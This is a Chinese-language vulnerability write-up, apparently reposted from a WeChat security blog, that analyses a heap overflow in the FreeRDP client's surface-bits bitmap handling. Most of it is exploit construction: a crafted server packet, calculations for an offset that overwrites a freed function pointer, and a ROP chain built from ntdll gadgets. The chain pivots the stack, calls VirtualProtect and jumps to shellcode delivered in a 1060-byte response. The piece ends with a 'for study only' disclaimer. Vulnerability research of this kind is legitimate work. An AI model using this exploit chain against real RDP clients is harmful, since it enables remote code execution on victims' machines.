作者 Sunglin@0103sec / 404 knownsec
更好阅读体验及评论交流请点击阅读原文
0x00 背景
0x01 漏洞分析
rdp_recv_callback->
rdp_client_connect_demand_active->
rdp_recv_demand_active->
rdp_read_capability_sets->
rdp_read_bitmap_capability_set
static BOOL rdp_read_bitmap_capability_set(wStream* s, rdpSettings* settings)
{
BYTE drawingFlags;
UINT16 desktopWidth;
UINT16 desktopHeight;
UINT16 desktopResizeFlag;
UINT16 preferredBitsPerPixel;
if (Stream_GetRemainingLength(s) < 24)
return FALSE;
Stream_Read_UINT16(s, preferredBitsPerPixel); /* preferredBitsPerPixel (2 bytes) */
Stream_Seek_UINT16(s); /* receive1BitPerPixel (2 bytes) */
Stream_Seek_UINT16(s); /* receive4BitsPerPixel (2 bytes) */
Stream_Seek_UINT16(s); /* receive8BitsPerPixel (2 bytes) */
Stream_Read_UINT16(s, desktopWidth); /* desktopWidth (2 bytes) */
Stream_Read_UINT16(s, desktopHeight); /* desktopHeight (2 bytes) */
Stream_Seek_UINT16(s); /* pad2Octets (2 bytes) */
Stream_Read_UINT16(s, desktopResizeFlag); /* desktopResizeFlag (2 bytes) */
Stream_Seek_UINT16(s); /* bitmapCompressionFlag (2 bytes) */
Stream_Seek_UINT8(s); /* highColorFlags (1 byte) */
Stream_Read_UINT8(s, drawingFlags); /* drawingFlags (1 byte) */
Stream_Seek_UINT16(s); /* multipleRectangleSupport (2 bytes) */
Stream_Seek_UINT16(s); /* pad2OctetsB (2 bytes) */
if (!settings->ServerMode && (preferredBitsPerPixel != settings->ColorDepth))
{
/* The client must respect the actual color depth used by the server */
settings->ColorDepth = preferredBitsPerPixel;
}
if (desktopResizeFlag == FALSE)
settings->DesktopResize = FALSE;
if (!settings->ServerMode && settings->DesktopResize)
{
/* The server may request a different desktop size during Deactivation-Reactivation sequence
*/
settings->DesktopWidth = desktopWidth;
settings->DesktopHeight = desktopHeight;
}
if (settings->DrawAllowSkipAlpha)
settings->DrawAllowSkipAlpha = (drawingFlags & DRAW_ALLOW_SKIP_ALPHA) ? TRUE : FALSE;
if (settings->DrawAllowDynamicColorFidelity)
settings->DrawAllowDynamicColorFidelity =
(drawingFlags & DRAW_ALLOW_DYNAMIC_COLOR_FIDELITY) ? TRUE : FALSE;
if (settings->DrawAllowColorSubsampling)
settings->DrawAllowColorSubsampling =
(drawingFlags & DRAW_ALLOW_COLOR_SUBSAMPLING) ? TRUE : FALSE;
return TRUE;
}
wf_post_connect->
wf_image_new->
wf_create_dib->
CreateDIBSection
HBITMAP wf_create_dib(wfContext* wfc, UINT32 width, UINT32 height, UINT32 srcFormat,
const BYTE* data, BYTE** pdata)
{
HDC hdc;
int negHeight;
HBITMAP bitmap;
BITMAPINFO bmi;
BYTE* cdata = NULL;
UINT32 dstFormat = srcFormat;
/**
* See: http://msdn.microsoft.com/en-us/library/dd183376
* if biHeight is positive, the bitmap is bottom-up
* if biHeight is negative, the bitmap is top-down
* Since we get top-down bitmaps, let's keep it that way
*/
negHeight = (height < 0) ? height : height * (-1);
hdc = GetDC(NULL);
bmi.bmiHeader.biSize = sizeof(BITMAPINFO);
bmi.bmiHeader.biWidth = width;
bmi.bmiHeader.biHeight = negHeight;
bmi.bmiHeader.biPlanes = 1;
bmi.bmiHeader.biBitCount = GetBitsPerPixel(dstFormat);
bmi.bmiHeader.biCompression = BI_RGB;
bitmap = CreateDIBSection(hdc, &bmi, DIB_RGB_COLORS, (void**)&cdata, NULL, 0);
if (data)
freerdp_image_copy(cdata, dstFormat, 0, 0, 0, width, height, data, srcFormat, 0, 0, 0,
&wfc->context.gdi->palette, FREERDP_FLIP_NONE);
if (pdata)
*pdata = cdata;
ReleaseDC(NULL, hdc);
GdiFlush();
return bitmap;
}
00,
0x84,0x24,//size = 1060
0x04, 0x1e,0x4, //size - 6
0x04, 0x00,//cmdType
0x00, 0x00,//marker.frameAction
0xFF, 0xE3, 0x77, 0x04,//marker.frameId
0x01, 0x00,//cmdType
0x00, 0x00, //cmd.destLeft // nXDst * 4
0x00, 0x00, //cmd.destTop // nYDst * width
0x00, 0x03,//cmd.destRight
0x04, 0x04,//cmd.destBottom
0x20, //bmp->bpp
0x80,//bmp->flags
0x00,//reserved
0x00, //bmp->codecID
0x00, 0x01, //bmp->width *4
0x01, 0x0, //bmp->height
0x00 ,4,0,0,//bmp->bitmapDataLength
rdp_recv_pdu->
rdp_recv_fastpath_pdu->
fastpath_recv_updates->
fastpath_recv_update_data->
fastpath_recv_update->
update_recv_surfcmds->
update_recv_surfcmd_surface_bits->
gdi_surface_bits->
freerdp_image_copy
Static BOOL gdi_surface_bits(rdpContext* context, const
SURFACE_BITS_COMMAND* cmd)
{
switch(cmd->bmp.codecID)
{
case RDP_CODEC_ID_REMOTEFX:
rfx_process_message();
case RDP_CODEC_ID_NSCODEC:
nsc_process_message();
case RDP_CODEC_ID_NONE:
freerdp_image_copy()
}
}
0x03 精确计算 offset
再来回顾下nYDst 是 cmd->destTop,nDstStep 是 cmd->bmp.width*4 , xDstOffset 为 cmd.destLeft*4,copyDstWidth 为 cmd->bmp.width * 4 BYTE* dstLine = &pDstData[(y + nYDst) * nDstStep * dstVMultiplier + dstVOffset]; memcpy(&dstLine[xDstOffset], &srcLine[xSrcOffset], copyDstWidth); 这里 offset = gdiBitmap_addr - Bitmapdata_addr; 需要通过设置 nYDst * nDstStep *1 + xDstOffset = offset 发送 bitmapdata 的数据包括可控内存区域的大小是1060,头部大小是 36 可控内存区域的布局如下:
最后的计算如下:
if (gdi_addr > Bitmapdata_addr)
{
eip_offset = gdi_addr - Bitmapdata_addr;
char okdata = eip_offset % 4;
UINT64 copywidth = 1024 * 0xffff;
if (okdata == 0)
{
if (eip_offset < copywidth)
{
eip_offset = eip_offset - 1016 + 32 + 32 + 64; //向后退 32 + 64
eip_y = eip_offset % 1024;
eip_ = (eip_offset - eip_y) / 1024;
nXDst = eip_y / 4;
}
}
}
0x04 主动调用 free
通过发送以上的 bitmap_data 数据会控制 hBitmap->free, 通过发送 RDPGFX_RESET_GRAPHICS_PDU 重置消息,并且调用 hBitmap->free 释放初始化的资源。
RDPGFX_RESET_GRAPHICS_PDU 消息处理 api 流程如下:
rdpgfx_on_data_received->rdpgfx_recv_pdu->rdpgfx_recv_reset_graphics_pdu ->gdi_ResetGraphics->wf_desktop_resize->gdi_resize_ex->gdi_bitmap_free_ex
通过调用 hBitmap->free(hBitmap->data)控制rip。
首先 rop 链的条件是得通过 pop ret 来利用栈上面的数据,所有说得控制栈上面的数 据才能构造出完整的 rop 利用链,这里观察了下调用 free 时的寄存器值: Rax = hBitmap->data rcx = hBitmap->data rdi = rsp + 0x40 hBitmap->data 的地址上面的堆数据正是被控制的数据,这里在忽略基址随机化的前 提下,在 ntdll 中通过 ROPgadget 找到了这样的滑块:
48 8B 51 50 mov rdx, [rcx+50h]
48 8B 69 18 mov rbp, [rcx+18h]
48 8B 61 10 mov rsp, [rcx+10h]
FF E2 jmp rdx
只要执行这条 rop 链就可以完美控制 rsp,接下来只需要调用 win api 来获取一片可执 行代码的内存,这里采用最简单的方式就是直接调用 virtprotect 来改写 可控内存区域 存在的内存页为可执行状态,在 x86_64 上面,调用 api 都是通过寄存器来传参的,而 virtprotect 的传参如下:
Mov r9d,arg4
Mov r8d,arg3
Mov edx,arg2
Mov ecx,arg1
Call virtprotect
综上所述,我的 rop 链代码是这样构造的:
UINT64 rop1 = 0x00000000000A2C08; //mov rdx, [rcx+50h], mov rbp, [rcx+18h],mov rsp, [rcx+10h],jmp rdx
UINT64 rop2 = 0x00008c4b4; // ntdll pop r9 pop r10 pop r11 ret
UINT64 rop3 = 0x8c4b2; //ntdll pop r8 ; pop r9 ; pop r10 ; pop r11 ;
ret
UINT64 rop4 = 0xb416; //ntdll pop rsp ret
UINT64 rop5 = 0x8c4b7; //ntdll pop rdx; pop r11; ret
UINT64 rop6 = 0x21597; //ntdll pop rcx; ret
UINT64 rop7 = 0x64CC0; //virtprotect
UINT64 shellcode_addr = ntdll_Base_Addr + rop1;
UINT64 rsp_godget = gdi_addr - 104;
memcpy(&shellcode[956], &shellcode_addr, sizeof(shellcode_addr));//向后退32
+ 64 rop 之 rsp 控制栈
memcpy(&shellcode[948], &gdi_addr, sizeof(gdi_addr)); //控制 rcx
memcpy(&shellcode[940], &rsp_godget, sizeof(rsp_godget)); //rsp 赋值
shellcode_addr = ntdll_Base_Addr + rop3;
memcpy(&shellcode[1004], &shellcode_addr, sizeof(shellcode_addr));//jmp rdx
赋值,rop开始执行
shellcode_addr = ntdll_Base_Addr + rop5; //rop 栈赋值 rdx
UINT64 ret1 = 924 - 72;
memcpy(&shellcode[ret1], &shellcode_addr, sizeof(shellcode_addr));
shellcode_addr = ntdll_Base_Addr + rop6; //rop re2
UINT64 ret2 = 924 - 48;
memcpy(&shellcode[ret2], &shellcode_addr, sizeof(shellcode_addr));
shellcode_addr = KERNEL32Base_Addr + rop7; //rop re3
UINT64 ret3 = 924 - 32;
memcpy(&shellcode[ret3], &shellcode_addr, sizeof(shellcode_addr));
UINT64 virtprotect_arg4 = 924 - 96;
shellcode_addr = gdi_addr - 112; //rop virtprotect_arg4
memcpy(&shellcode[virtprotect_arg4], &shellcode_addr, sizeof(shellcode_addr));
UINT64 virtprotect_arg1 = 924 - 40;
shellcode_addr = gdi_addr - 888; //rop virtprotect_arg4
memcpy(&shellcode[virtprotect_arg1], &shellcode_addr, sizeof(shellcode_addr));
memcpy(&shellcode[900], &shellcode_addr, sizeof(shellcode_addr)); //ret to
shellcode
respose_to_rdp_client(shellcode, 1060);//attack heap overflow
通过 rop 链到执行 可控内存区域地址代码,寄存器 rdi 的值都没有被改写,所以最后在执行可控内存区域的时候,可以通过 rdi 来恢复栈地址,这里是通过最简单的方式了:
Mov rsp,rdi
最后执行可控内存区域位置代码。
仅供学习参考,请勿用于其他途径!造成任何不良影响,我方概不负责。
原文始发于微信公众号(凌晨一点零三分):FreeRDP安全性思考
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论